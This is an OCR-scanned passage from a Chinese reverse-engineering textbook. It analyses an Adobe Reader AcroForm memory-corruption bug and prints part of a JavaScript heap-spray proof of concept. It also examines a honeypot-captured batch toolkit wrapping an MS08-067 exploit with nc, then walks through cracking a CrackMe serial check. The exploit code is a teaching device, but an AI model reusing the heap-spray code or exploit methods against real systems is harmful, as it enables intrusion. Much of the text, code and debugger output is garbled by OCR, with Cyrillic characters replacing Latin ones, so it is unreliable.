以 直接 让 程序 执行 多 次 后 ， 发 现 strcpy 函 数 内 部 的 内 容 ， 其 实 就 是 将 超 长 字符 串 以 4 个 字 节 
( 即 4 个 a 为 一 段 ) 为 一 个 单位 复制 到 寄存 器 ， 那 么 在 栈 溢出 发 生 的 最 后 一 个 调用 ， 可 以 看 
到 此 时 ebp 的 值 是 0012FEC0， 而 当 以 超 长 串 复制 到 寄存 器 后 ， 可 以 看 到 ebp 的 值 被 修改 成 
了 61616161， 这 也 就 造成 了 栈 溢出 〈 见 图 8-19) ， 这 里 只 要 精确 地 修改 返回 地 址 的 值 就 能 
实现 对 于 程序 的 控制 ， 从 而 执行 想 执 行 的 内 容 ， 修 改 overflow 数 组 的 内 容 如 图 8-20 所 示 。 
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Модгова: 49010000 49095000 C:\WINDOWS\svstenm32\Msftedit 411 
{238.698}: Access violation - code с0000005 (1!!! second chance |!!!) 


вах" 00000528 ebx=00000001 есх=0с0с0с20 е9х=10242074 еғі»10242074 ара: 
1р- 8886888 88 е=р=0012аеа0 еБр-00124е4с 10р1-0 пу up ei pl zr па ре n 
s=001b ===0023 айты. анны fs=003b а-0000 211. 00200246 


图 8-22 ”PDF 漏洞 触发 现场 
这 就 是 案 发 的 时 候 ， 可 以 看 到 目前 内 存 位 置 在 88888888， 其 实 这 时 候 栈 已 经 被 破坏 
了 ，eip 足 转 到 一 个 没有 东西 的 内 存 空间 ， 所 以 程序 崩 江 了。 现在 就 开始 逆 回 还 原 整个 过 
程 ， 通 过 命令 来 回溯 整个 过 程 。 
如 图 8-23 所 示 ， 由 下 往 上 是 依次 调用 关系 ， 就 是 C 语 诗 的 函数 组 套 ， 比 如 说 A 调用 B， 
B 调 用 了 C， 那 么 “ 案 发 ”前 的 那 一 刻 函 数 对 应 的 地 址 是 208as4e0， 用 WinDbsg 奏 看 该 段 函 
数 的 汇编 代码 ， 如 图 8-24 所 示 。 


0:000» kb 

ChildEBP RetAddr Args to Child 

ЧАКНТНС: Frame ТР not in any known module. Folloving frames вау be wrong 
0012ае9с 208а54е0 00000001 8501909 00000001 (0х88888888 

00124е4с 208а59Һе 0012а#14 10241Ғ44 00000001 АсхгоЕРоги!Р1ааТиНази+0ха3162 
001242144 208а5538 00124488 00000000 00000001 ÀAcxroFoxrm!PlugInMain+Oxa3690 
00124Ғ64 208а5488 0012а#88 04аа4530 00000001 ÀAcroForm!PlugInHain+Oxa320a 
0012аЁас 20сассс0 00129Ее8 04аз4530 00000001 АсгоҒогһ!РімсіпМаіпғйхаЗ1ба 


图 8-23 ”PDF 漏洞 触发 时 堆栈 调用 情况 


4 

18h 

eax, Offset ÀcroForwKw!DllUnregisterServer+0x42ctftfd (20991619) 
АстоЕ0сти+0х1478 (20801478) 

edi, ecx 

dvord ptr [ebp-10h].edi 

dvord ptr |еБр+10Ь) 

dvord ptr [ebp-14h]. 0 

dvord ptr а 

нок.) h] 


AcroForxiPluginMain+Oxa31f1 (208а551Е) 
еах,еах 

АсгоЕога!РішдіпМаіп%0ха3163 (208а5491) 
езх.4 


20825461 с20400 
6а18 
Ь814164420 
е808с9#5#ї 
8Ь#9 
897440 
#17510 
8365ес00 
#17505 
8d45dc 


50 

2397000000 

85с0 

7405 
208а548с 83с004 


208а5491 33с0 
20825493 8530 


з 


ТЗ 


- 
г ~ 


eax, eax 
esi. dvord ptr [тах] 


ЕЗ 


208а549а 7403 ) ÀAcroForxm!PlugInMain+Oxa31?71 (208а5494) 
208а549с ##4604 1 dvord ptr [es1+4] 
с?45е4Ь82се820 dvord ріг [ebp-1Ch], offset АстоЕога! | Шиагез1зегбегтега)х44е! 
33db ерх.еБх 
43 \ еһх 
8444е0 ecx, [ebp-20h) 
89544с dvord ріг [ebp-4]. ebx 
е82е42{8ї{ АсгоЕога!РішдіІпИа1п%0х273Ь4 (208296е2) 
8Ь7+#44 edi, dvord ptr [е91+441] 
854 еді .edi 
7430 j АсхоЕсга ! Р| из пат п+0ха31Ь4 (208а54еЬ) 
837е4400 dvord ріг [е51+44%].0 
740b j àcroFora!PlugInMain+0xa319e (208а54сс) 
#Е75Е0 dword ptr |еБр-10Ь) 
8р4е44 есх,ачота ptr [esi+44h] 


208а54сс ff4704 i dvord ptr [edi+4] 
208454сЕ 854е44 ecx.dvord ріг [esi+44h] 


208а5444 740а ] ÀcroForm!PlugInMain+Oxa31b2 (208а54е0) 
20885446 #Е 4904 dvord ptr [ecx+4] 
+0ха31Ь2 (208а54=0) 


ТТ руа TO PT Th 
208а544Ь 8b01 eax, dvord ptr [ecx] 
208а54д4е {#10 dvord ptr [еах 
208а54е1 dbet есх. edi 


8-24 PDF 漏洞 触发 前 汇编 代码 分 析 
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画 线 的 部 分 是 笔者 认为 最 重要 的 部 分 ， 为 了 方便 大 家 理解 ， 用 一 个 流程 图 来 简化 上 面 
的 过 程 ， 如 图 8-25 所 示 。 


call AcroForm!PluglInMain+0xa31fl(eax) retum eax 
[еах+4] 
= [esi+44h]= (еах--4--44Һ) 


вах = [ecx] = [esir44h] = [eax+4+44h] 


сай eax 漏洞 触发 
图 8-25 PDF 漏洞 触发 流程 
由 图 8-25 可 以 看 到 漏洞 触发 的 原因 就 在 于 AcroFormIPlugInMain+0xa31f1 返 回 的 eax， 
经 过 多 次 赋值 后 ，eax 被 改变 了 。 因 为 这 个 改变 ， 导 臻 最 后 call eax 的 时 候 使 程序 跳 转 到 了 
88888888， 此 时 栈 已 经 被 破坏 了 。 用 IDA Pro 来 加 载 这 个 存在 漏洞 的 AcroForm.api， 查 看 这 
段 函数 的 伪 代 码 〈 见 图 8-26) 。 


int _ stdcall sub 208й551Ғ(іпЕ a1, int a2, int аз) 


sub_208ñ553F(a1, a2, аз, 8, 8); 
| return а1; 


, 
图 8-26 ”PDF 漏洞 触发 时 伪 代 码 

其 实 通过 上 面 的 汇编 语句 也 不 难看 出 eax 作 为 这 个 函数 第 一 个 参数 被 传 入 ， 经 过 这 个 
函数 的 执行 ， 第 一 个 参数 又 被 返回 ， 然 后 继续 上 面 的 流程 ， 这 个 参数 被 传 入 后 又 进行 
了 sub 208A553F 这 个 函数 的 一 系列 操作 。 由 于 笔者 没有 下 载 符 号 表 ， 所 以 无 法 告诉 大 家 
函数 的 名 字 ， 这 个 函数 里 面 的 代码 有 100 行 左右 ， 具 体 分析 过 程 笔者 就 不 蒙 述 了 ， 其 大 
致 功能 其 实 就 是 创建 一 个 新 的 对 象 指针 ， 并 且 分 配给 这 个 指针 64 Byte 的 内 存 ， 如 图 8-27 
所 示 。 

v24 = ж( DWORD #)(922 + 4)-- == 1; 


if ( v24 ) 
(ww(uoid ( cdecl жжж){ DWORD, DWORD}}v22}(1 


} 
025 = 546 2988 8948Е (64); 


ж( BYTE #)(а1 - 8) = 8; 
if ( 25 == 97 ) 
u26 = 9; 
else 
926 = sub 20829301(97, al - 24, 97); 
*( BYTE *)(а1 - 4) = 6; 
if ( 926 ?= u7 ) 
++ #( DWORD ж) (926 + 4); 
927 = *( DWORD *)(а1 - 64); 


8-27 pdf 漏洞 触发 指针 空间 分 配 异 常 点 伪 代 码 
我 们 可 以 用 IDA Pro 看 到 分 配 空间 的 过 程 ， 其 实 这 里 用 汇编 看 可 能 更 清晰 〈 见 医 
8-28) 。 


208а5720 6Ба40 


208а5722 eße83cf6ff call ÀCroForm!PlugInMain+Oz70e1 (2080940f ) 
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图 8-28 ”PDF 漏洞 触发 指针 分 配 异 常 点 汇编 代码 

push 40h 就 是 将 分 配 内 存 空间 的 大 小 作为 参数 传 入 ，40h 转 换 成 十 进 制 就 是 64， 
而 下 面 call 的 函数 其 实 就 相当 于 C 语 言 中 的 malloc， 只 不 过 malloc 是 动态 分 配 空 间 。 
再 回 到 之 前 的 流程 图 中 ， 问 题 就 来 了 ，eax+4 作 为 这 个 指针 的 起 始 被 传 出 赋值 给 了 esi， 然 后 
esi+44h 赋 值 给 了 ecx， 而 其 实 这 个 指针 的 大 小 只 有 40h， 这 就 造成 了 内 存 地 址 越界 ， 导 致 了 漏 
洞 的 触发 ， 那 么 只 要 想方设法 构造 这 个 越界 位 置 中 的 值 就 可 以 完成 对 这 个 漏洞 的 利用 。 

利用 漏洞 部 分 只 做 简要 的 说 明 ， 因 为 会 涉及 ROP 链 的 构造 ， 而 且 这 个 漏洞 的 利用 其 实 
也 伴随 大 男 一 个 内 存 泄露 基 址 的 漏洞 ， 以 此 来 绕 过 DEP 和 ASLR 保 护 。 其 实 该 漏洞 本 身 就 
己 具 备 了 绕 过 ASLR 的 功能 ， 但 是 由 于 构造 畸形 数据 的 特殊 性 ， 如 果 单 用 这 个 漏洞 只 能 者 
盖 少 量 的 shellcode， 而 利用 这 个 漏洞 会 用 到 正常 用 的 heap spray， 也 就 是 对 喷 技 术 ， 来 看 看 
它 的 内 存 空 间 变 成 了 什么 〈 见 图 8-29) 。 


0с0с0с28 88 88 88 88 28 Ос Ос 0с 28 Oc Oc 0с 28 Oc Oc Oc ....( 
0с0с0с38 28 Oc Ос Ос 28 Ос Ос Oc 28 Ос Oc Oc 28 Ос 0с Oc (...(.. 
0с0с0с48 28 Oc Ос Oc 28 Ос Ос 0с 28 Ос Oc 0с 28 Ос Oc Oc (...(... 
0с0с0с58 28 Oc Oc Oc 28 Oc Ос Oc 28 Ос Ос Oc 00 00 00 00 (...( 
0с0с0с68 00 00 00 00 00 00 оо 00 оо 00 00 00 00 00 00 00 ................ 
0с0с0с78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0с88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00°................ 
0с0с0с98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0са8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 _................ 
0с0с0сь8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 _................ 
0с0с0сс8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0с48 00 00 00 оо оо оо 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0се8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0сЕ8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00.00 ................ 
0с0с0408 00 00 оо оо оо оо оо 00 оо 00 00 00 00 00 00 0O ................ 
0с0с0418 00 00 00 00 00 00 00 00 28 Ос Ос Oc 01 00 00 00 ........ 
0с0с0428 88 88 88 88 28 0с Oc Oc 28 0с Oc Oc 28 Oc Oc Oc ....( 
0с0с0438 28 0с 0с 0с 28 0с Ос Ос 28 Ос 0с йс 28 Ос 0с 0с (...(... 

( 

( 


епо ов в а"е.в 


ТРЕЯ T. 


раз 


0с0с0448 28 0с Ос Oc 28 0с Ос Ос 28 0с Ос Oc 28 Ос 0с 0с (...(.. 
0с0с0458 28 Oc Oc Oc 28 Oc Ос Oc 28 0с Ос Oc 00 00 00 00 (...(... 
0с0с0468 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00’................ 
0с0с0а78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 _................ 
0с0с0488 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0498 00 00 оо 00 оо 00 00 00 00 00 00 00 00 00 00 00°................ 
0с0с09а8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00°................ 
0с0с04ь8 00 00 оо оо оо оо оо 00 00 00 00 00 00 00 00 00 ................ 
0с0с04с8 00 00 00 оо оо оо оо оо оо 00 00 00 00 00 00 00 ................ 
0с0с044а8 00 00 оо оо оо оо оо оо оо 00 00 00 00 00 00 00 ................ 
0с0с04е8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 
0с0с0ағв 00 00 00 оо оо оо оо оо оо 00 00 00 00 00 00 00°................ 
0с0с0е08 00 00 00 00 00 00 оо 00 00 00 00 00 00 00 00 00 ................ 
0с0с0е18 00 00 00 00 00 00 00 00 28 Ос Ос Oc 01 00 00 00 ........ 
0с0с0е28 88 88 88 88 28 Ос Ос Ос 28 Ос Ос tc 28 Ос Oc Oc ....( 
0с0с0е38 28 0с Ос Oc 28 Oc Ос Oc 28 Ос Ос Oc 28 Oc Oc Oc (...(... 

( 

( 


а-а в: е я 


п. 


0с0с0е48 28 Ос Oc Oc 28 Ос Ос Oc 28 Ос Ос Ос 28 Oc Oc Oc (...(.. 
0с0с0е58 28 Oc Ос Oc 28 Oc Ос Oc 28 Ос Ос Oc 00 00 00 00 (... 
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这 段 喷射 代码 在 POC 中 也 有 体现 ， 我 们 用 Ultra Еау РОС. 


var dataNodes = []; 

var uiListNodes = []; 

Var choiceListNodes = []; 
var соптептАгеаз = []; 
Var strArray = []; 

Var CntArea = 147; 


уаг 999; 


Var дЕакеРоіпёег = 0х0с0с0с20; 
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var gTargetEip = 0х88888888; 


var padding = ипезсаре ("Зиррррь"); 


while ( padding-length < (449*2+2*29*11) ) {padding += padding; 
padding = padding.substring(0, (449*2+2*29*11)); | 
function DwordToString( val ) { 
return String.fromCharCode ( val & OxFFFF ) + String.fromCharCode 
( (та! >> 16) Е ОХЕЕЕЕ |: 
} 


function HighWord( val ) { 
return String.fromCharCode ( (val >> 16) & OxFFFF ); 


var contentAreas = []; 

Ғипсііоп А11осаіеСопіепіАгеа ( спі ) { 
var name = "contentArea"; 

for ( var і = 0; 1 < спі; і ++ ) 4 


ContentAreas .push ( хѓЁа.ёетр1абе .сгеаіећоае (name, "七 ") ); 


Function А11осаіереҒесііуећойеѕ ( ҒакеРоіпіог ) | Var thunk = 
DWordToString( ҒакеРоіпіог ); while (thunk.length < 
а роса т=п: 
А|ТосатеСопГепГдАгеа( (2*2*2*2*2*2*2*2*2) |; 
var lastWord = HighWord( ҒакеРоіпіог ); 
var АЕЕЕСТТУЕ = []; 
for (var index = 0; index < 40; іпаех++) (| 
АЕРЕСТТУЕ -ризЬ ( thunk.substring( 0, ((47*2*7*5*2*2*2*2) 
/ 2) - 3) + lastWord + padding ); } 
AllocateContentArea( CntArea ); 
} 
function Trigger( fakePointor ) (| 
AllocateDefectiveNodes( fakePointor ); 
var node = 


xfa.resolveNode ("xfa[0].form[0] .form1[0] .#pageSet [0] .раде1 [0]. 
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#+зо6Еоги [0] .Не1а0[0] .#01"); 
1Е ( поае == џпаейпеа ) | 
return false; 
} 
Егу 4 
node.oneOfChild = сһоісе115ѕіМоаеѕ.рор (); 
} 
Catch (е) | 
return false; 
} return true; 
} 
Гипсілоп СО) | 
арр.а1ег® ("до"); 
for (var i = 0; 1 < 5; ++ i) Trigger( дЕакеРо1п ег ); } 
Ашс оп Start () { Рог (мағ іпдех = 549; іпдех >= 1; іпдех--) (маг поде = 
х Ға. гезо1уеМоае ("ха [0] . Еогм [0] . Ғогт1 101. РЕрачезе [0] 
раде1 [0] .#subform[0] .йе1а" + index.toString() + "101.#11101"); 
uiListNodes .push (node) ; маг посе = 
xfa.resolveNode ("хҒа [0] .form[0] .forml[0] .#радебеї [0] .раде1 [0] .#subform[0] . 
field" + index.toString() + "[0].#ui[0] .#choiceList[0]"); choiceListNodes. 
push(node); } 
х Ға. ("xtEa]| Db: Torm[ID0] .Еогш1 [0] .150о5Еогм [0] .гесЕ1"). 
Ккеер.ргеуіоцѕ = "contentArea"; 


ggg = app.setTimeOut ("Со ();", 500); } 
var blocks = [];function Spray() | 
var ZERO = DWordToString( 0); 
var pTargetEip = DWordToString( gFakePointer + 8 ); 
var blocksize = 0x400000 - 0x38; 
var trunk = pTargetEip; 
trunk += DWordToString( 0x00000001 ); //геҒегепсе count 
trunk += DWordToString( gTargetEip ); //сопіко1 eip 
while ( trunk.length < 0х44 / 2 ) trunk += pTargetEip; 


trunk = trunk.-substring ( 0, 0х44 / 2); 
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trunk += 7ЕВО; // [ЕакеРоіпіег + 0х48] = пи11 


while ( trunk.length < 0x100 / 2 ) trunk += ZERO; 
Cronk = ЕгапК. 5656 г1па ( 0, 0х100 / 2); 


while ( trunk.length < blocksize / 2 ) trunk += trunk; 


ET 
blocks .push (trunk.substring (0, (blocksize/2)-2)+pTargetFip ); 
} 
//5ргау ѕһе11соае 
/* 
trunk = pTargetFip; 
while ( trunk.length < 0x1000 ) trunk += trunk; 


while ( trunk.length < blocksize / 2 ) trunk += trunk; 
Тат Dy rira D upp Е 
blocks .push (trunk.substring (0, (blocksize/2)-2)+pTargetEip ); 
} 
Зу 


笔者 给 大 家 展示 了 部 分 堆 喷 的 代码 ， 相 信 对 Web 略 有 研究 的 谈 者 可 能 会 很 熟悉 ， 这 是 


用 JavaScript 完 成 的 ， 正 浏览 器 多 数 情 况 下 也 是 利用 堆 喷 技术 来 绕 过 ASLR， 其 中 填充 大 量 
内 存 块 喷射 0c0c 的 过 程 也 是 用 JavaScript 完 成 的 。 


全 此 ， 简 单 的 漏洞 分 析 束 完成 了 ， 其 实 这 中 间 包 含 了 成 百 上 千 次 的 反复 调试 ， 对 各 个 


寄存 器 的 值 都 要 有 清醒 的 认识 ， 而 且 这 个 漏洞 还 有 很 多 很 多 细节 没有 跟 大 家 说 明 ， 比 如 指 
针对 象 的 格式 ，esi+44h 布 置 了 什么 东西 ， 感 兴趣 的 谈 者 可 以 去 网 上 搜索 一 下 。 


82 МШ ТОЛА 


821 ТРЕ НАЙ T АН) 


笔者 在 虚拟 机 里 搭建 了 一 个 密 饶 环境 ， 现 在 确实 已 经 是 干净 日 孔 ， 佑 计 被 各 种 人 做 


成 了 “肉鸡 ”， 虽 然 设 置 了 快照 但 是 一 直 没 有 还 原 过 ， 一 直 想 看 看 能 不 能 拿 到 有 价值 的 
exploit。 前 两 天 有 一 个 黑客 在 笔者 的 蜜 饶 里 摆 了 一 个 工具 包 ， 还 设置 了 密码 ， 这 个 工具 包 
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是 付费 的 ， 笔 者 首先 想到 了 0day， 也 许 这 个 黑客 掌握 0day 呢 ， 于 是 笔者 果断 把 工具 包 拿 了 
出 来 逆 回 分 析 了 一 下 。 

工具 包 里 是 一 个 需要 输入 密码 的 exe， 不 多 说 直接 放 到 OllyDbg 里 跑 一 下 看 看 能 不 能 得 
到 密码 ， 程 序 入 口 直接 是 Pushad， 按 F8 键 单 步 执行 几 步 之 后 就 直接 返回 了 ， 于 是 首先 想到 
的 是 加 壳 ， 放 到 PEiD 里 看 一 下 〈 见 图 8-30) 。 

果然 是 加 过 了 ， 还 好 是 UPX 壳 ， 现 在 脱 UPX 壳 的 脱 壳 机 可 以 轻易 搜索 和 下 载 ， 就 不 讲 
手动 脱 壳 的 过 程 了 ， 将 UPX 壳 脱 掉 之 后 再 用 PEiD 跑 一 下 看 看 〈 见 图 8-31) 。 


Ап: РЕС Ми о | Лав: ЕР Б. 
文件 偏 移 : В: 文件 偏 移 : В. 
连接 器 版 本 : 子 系统 : 连接 器 版 本 : 子 系统 : 


什么 神权 找到 ж 


总 在 最 前 (S) m УЖЕ) 总 在 最 前 (S) Ге CEES) (2) 
图 8-30 ”PEiD 显 示 加 壳 情 况 图 8-31 UPX 脱 壳 后 PEiD 显 示 情 况 


EP 段 的 值 是 .code 说 明 UPX 壳 已 经 正常 脱 掉 ， 将 脱 壳 后 的 程序 放 到 OllyDbg 里 跑 起 来 ， 
刚 开 始 这 个 程序 只 是 从 寄存 器 读 取 了 一 些 参 数 ， 直 接 按 F9 键 让 程序 完全 跑 起 来 。 

经 过 反 汇 编 调 试 ， 可 以 看 到 这 个 程序 跑 起 来 后 在 C 盘 下 的 一 个 隐藏 一 个 目录 里 创建 了 
名 为 1.tmp 的 文件 夹 〈 见 图 8-32) ， 同 时 创建 了 一 个 名 为 01.bat 的 脚本 ， 然 后 它 将 这 个 脚本 
运行 了 起 来 。 接 下 来 我 们 到 C 盘 下 的 这 个 目录 里 看 看 这 个 脚本 的 内 容 ( 见 图 8-33) 。 


мона 


КРУС РИЧЕ 


22 bBp— Tami 
Ө 村 这 个 文件 天 发 到 
“ 


color 
title 出 人 名 种 发 包 , 通 杀 机 器 需要 的 联系 q: 


echo . 


ОЁҒ 
for /Е 341 іп (ips.txt) до (start 02.bat 141) 


图 8-33 ”隐蔽 目录 下 脚本 内 容 
简单 看 一 下 这 个 脚本 的 内 容 ， 其 中 %var% == "520." 的 if 语句 中 暴露 了 这 个 程序 的 密 
19, in (ips.txt) do (start 02.bat %%i) 说 明 当 密码 判断 成 功 后 ， 将 对 ips.txt 中 保存 的 卫 
地 址 执行 02.bat 脚 本 。 现 在 马上 打开 02.bat 脚 本 ， 看 看 脚本 的 内 容 〈 见 图 8-34) 。 
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图 8-34 ”跟踪 生成 的 02.bat 脚 本 
从 图 8-34 可 以 看 到 这 个 脚本 在 执行 cs.exe 文 件 ，%1 是 它 的 参数 ，nc 就 是 常见 的 nc 链接 
工具 。 直 接 输 入 520. 密 码 ， sd li ( 见 图 8-35) . 


CrxAWINDOWSVsystesa32Vcad еке - 02.bat 12 = 


125. 64.0.0 


图 8-35 工具 追踪 
至 此 ， 这 个 所 谓 的 收费 工具 的 真面目 全 部 显示 了 出 来 ， 原 来 就 是 emm 大 牛 在 2008 年 写 
的 MS08067 的 exploit， 这 个 收费 工具 现在 网 上 随处 可 见 ， 其 实 就 是 写 了 个 批量 的 脚本 ， 并 
没有 什么 0day。 


8.2.2 ”从 CrackMe 到 逆向 破解 技术 


CrackMe 其 实 是 一 些小 程序 ， 公 开 给 别人 尝试 破解 ， 编 写 CrackMe 的 人 可 能 是 程序 
员 、 黑 客 等 ， 他 们 可 能 是 为 了 验证 目 己 的 程序 安全 性 ， 也 可 能 为 了 挑战 其 他 黑客 的 水 平 ， 
最 终 形成 了 破解 技术 中 CrackMe 的 独特 文化 。CrackMe 简 称 CM， 也 存在 CM 竞赛 形式 ， 多 
见于 一 些 论坛 。 
接 下 来 ， 通 过 对 一 个 CrackMe 破 解 过 程 的 分 析 ， 加 深 谈 者 对 破解 技术 的 理解 ， 该 
CrackMe 如 图 8-36 所 示 。 


— ЖАР — 


N МА жазтенжнт 


图 8-36 来自 看 雪 论 坛 发 布 的 Crackme-160.chm 
首先 运行 一 次 CrackMe， 是 一 个 普通 的 序列 号 程序 。 
+: 这 个 CrackMe 的 作者 有 点 偷懒 了 ， 上 面 那 行 相当 于 输入 ， 下 面 那 行 是 需要 算 的 序 
15, 28-37 F. 
А СгасЕШе 


Registration Information 


Enter | 
Enter | 


8-37 程序 界面 
首先 用 PEiD 检 查 一 下 ， 结 果 如 图 8-38 所 示 。 
"Е РЕЗО $0.95 


Не: C:\Documents and 5ettingsWM = [Ш\Вгай 5оЫезКу.2.ехе A 


Entrypoint: 00001Е00 EP Section: text 
File Offset: 00001Е00 First Bytes: 55,8B,EC,6A 
Linker Info: 6.0 Subsystem: Win32 GUI 


Microsoft Visual C++ 6.0 


м |[ кє | 
ЖТ. 


图 8-38 ”PEiD 查 询 结 果 
从 图 8-38 中 可 以 看 到 ， 这 是 一 个 没有 充 的 程序 ， 用 VC++ 6.0 编 译 。 
首先 要 找到 计算 序列 号 的 部 分 ， 既 然 没 有 充 我 们 就 可 以 直接 用 OD 载 入 。 
这 个 程序 下 断 点 的 方法 很 多 ， 这 里 举 几 个 例子 。 


1. 查找 参考 字符 串 ( 见 图 8-39 ) 


Пзжтъзжиат Brad 50оБ:. Тех? 


00101305 push Brad 500 . 00102052 

804014E4| push Brad 500 . 080402 ВВЕ 

90401570 push Brad 500. 00304020 “скаские“ 

9094091582 push Brad 500 . 00404028 “User Name must һауе at least 5 characters." 
8840161Е push Brad Sob . 8884854 "glu" 

99401669 | mou esi,Brad_Sob.00404058 “Correct?? 

0010168Е | mou есі,Вғай Sob .6994984878 "<BrD-SoB> 


00101683 mou esi,Brad Sob . 00304098 "Incorrectt+, Try Again." 
00401601 mou есі,Вғай Sob .60694986BB “Correct мау to go, You Got It." 
994 016ЕЗ push Brad 500 . В0ц 408 "СбғаскНе" 

884081765! push Brad 500 . 904045808 “Crackie” 

80Ң01Е10| sub esp ,Bx68 (初始 CPU 选择 ) 

99481Е75 push 09х10000 UNICODE "=::=::\" 


8-39 查找 参考 字符 串 


— 158 — 


第 8 章 ， 逆向 技术 与 软件 安全 = ШИ 


从 图 8-39 可 以 看 到 “User Маше must have at least 5 characters.” “Сопеси way to го, 
You Get It.”“Correct!” 这 几 个 比较 可 疑 的 字符 串 ， 对 每 个 附近 的 代码 人 简单 跟踪 分 析 一 下 
就 能 找到 关键 跳 转 的 位 置 ， 这 里 不 再 资 述 。 


经 分 析 可 知 ， 计 算 序 列 号 的 代码 在 这 


E9 F9010009 ]тр Brad_Sob -694917B7 

C745 Ей 009900! mov dword ptr се: |ебр-0х281|,8х9 

ЕВ 99 jmp short Вғай 500. 80301500 

:8855 ЕЙ тоу edx,dword ptr 55: [ебр- 09х20] 

8362 01 add едх, 0x1 

8955 ЕЙ mou мака ptr $5: [еБр-0х280] ,edx 

8845 ЕЙ тоу eax,dword ptr 55 : [ебр- 9х201 

3845 Е стр eax,dword ptr 55: [ебр- дх1С1 
jge short Brad Зов. 001016514 


90401589 |, 
981015 ВЕ 
88581505 
80501507 


mou есх,Пшағй ptr $$ :[ебр- 68х28] 
push есх 

Теа ecxydword ptr 55 :[ебр- 6514] 
call Вғап Хор 00:81900 

поузх еах,а1 

mou eax,dword ptr $55 :|ебр- 0х10] 
add еах,ейх 

mou dword ptr ss:[ehbhp-Bx10] ‚еах 
mov ecx,dword ptr $$ :Герр-0х20] 
shl есх,8х8 

mou edx,dword ptr << = [еБр- 0х101 
хо“ едх „есх 

mou dword ptr 55: [ебр-0х10] ,edx 
mov eax,dword ptr $5 :[ебр- 6520] 
add вах, 0х1 

mov ecx,dword ptr ss:[eDp-0x1C] 
imul ecx,dword ptr 55: [еьр- 90х20] 
not есх 

imul вах ,есх 

mov edx,dword ptr 55: [ебр- 09х19] 
imul едх,сах 

mou dword ptr ss:[ehbp-Bx10] ,edx 
jmp short Brad 501). 08ң015С67 


ЕВ 16039098 
ВЕВЕОВ 
88ч5 FÜ 
8362 

8945 ҒИ 
8840 ЕВ 
С1Е1 08 
8855 FÜ 
3301 

8955 ЕВ 
88:5 ЕЙ 
взса 01 
8640 ЕҢ 
BFhF3D ЕЙ 
F7D1 
BFRFÚ1 
8B55 ЕЙ 
ӨҒАЕре 
8955 FA 
ЕВ ñD 


90401618 | ° 


部 分 ， 如 图 8-40 所 示 。 
w 


图 8-40” 反 汇编 代码 ( 序列 号 计算 部 分 ) 


2. API A 


尝试 使 用 GetDlgItemTextA、GetMessageA、GetMessageW 等 API， 随 意 输入 一 个 
name， 单 击 Check 验 证 ， 程 序 成 功 在 GetMessageA 处 断 下 。 然 后 按 Ctrl+F9 组 合 键 返 回 ， 找 
到 程序 领空 内 调用 的 代码 ， 癌 下 寻找 验证 部 分 ， 或 者 按 Alt+K 组 合 键 打 开 堆 栈 调用 窗口 


( 见 图 8-41) 。 


hWnd = 
Buffer = 
Count = 


99383838 
9х9 


99127600 | 805015561? < пр .ЕМЕСЦ2 .#3097> 


88-41 


пЕсин2 .7 30 80ЯВЕ 


88840158 (class="Edit" ‚рак 


Вғай 500 . 90491551 


调用 堆栈 窗口 


从 图 8-41 中 可 以 看 到 程序 领空 内 调用 堆栈 的 函数 地 址 为 00401556， 双 击 跟 入 ， 结 


果 如 图 8-42 所 示 。 


9848107Е|- FF25 4831409090 | јтр dword ptr ds:[<&NFC42 
99491084 |- FF25 50218008 | jmp dword ptr ds:[<&MFC42 
99%9108Я - FF25 50314000 | jmp dword ptr ds:[<&MFC42 
90491098 |- FF25 5431409090 | пр dword ptr ds:[<&NFC42 
AALAINNA ссос соохиппа imn дала пы Яс [T ZPHL0 hO 


.#2818>] пЕсц2 .#2818 
- #5223] пЕсц2 . #4224 
-#3097> ] пЕсц2 .#3097 
-#537>] пЕсц2 .#537 

наз дохл m£eh? M14140 


图 8-42 ”跟踪 代码 
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从 图 8-42 中 可 以 发 现 编译 器 罗列 的 API 的 入 口 ， 接 下 来 可 以 按 Ctrl+R 组 合 键 查找 调用 
这 段 代 码 的 参考 〈 见 图 8-43) 。 


O 湖 老 位 于 Brad Sob:.text 于 00401р8А 


90491551 | call <jmp.&MFC42.#3097> 
90491565 | са11 <jmp.&MFC42.#3097> 
90401088 | jmp dword ptr 05: «ЕМЕСЦ2 .#3097>] (ЗЕ CPU 选择 : 


图 8-43 ”查找 参考 
分 别 跟 入 两 个 call 语 句 ， 分 析 附 近代 码 可 知 在 第 2 个 call 语 句 下 面 的 是 验证 序列 号 的 
程序 。 
找到 计算 序列 号 的 代码 之 后 ， 我 们 在 计算 处 上 方 及 中 途 下 断 点 ， 如 图 8-44 所 示 。 


short Brad $06 .0909491508 
edx ,dword ptr 55:|ебр- 8х2й| 
edx, 9х1 
dword ptr 55: [ебр- 09х28] ,edx 
еах ,dword ptr 55: [ебр- 98х28] 
еах ,dword ptr 55 :|ебр- Вх1С | 
short Вкад 500 . 8840161 
есх ,dword ptr 55:|ебрр- 8х2й| 
push есх 
Теа ecx ,dword ptr 55: [ебр-0х12] 
call Brad 500.00481988 
поубх edx ,al 
еах ,dword ptr 55:|ебр- 09х19] 
еах ‚едх 
dword ptr 55: [ебр- 09х18] ‚еах 
есх ,dword ptr 55: [ебр- 08х20] 
ecx, 9х8 
ебх ,dword ptr 55: [ебр- 68х19] 
едх „есх 
ашаға ptr 55: [ебр- 09х10] ,edx 
еах ,dword ptr 55: [ебр- 09х29] 
еах ‚ 9х1 
есх ,dword ptr ss:[ebp-0x1C] 
imul ecx ,dword ptr 55: [ебр- 09х28] 
not есх 
imul еах,есх 
mou edx ,dword ptr 55: [ебрр- 08х10] 
imul edx ,eax 
mou dword ptr 55:Геһр-8х18|,ейх 
jmp short Вкад_$06 . 90491507 
00640161A 8B45 FO пау eax ,dword ptr ss:[ebp-0x18] 


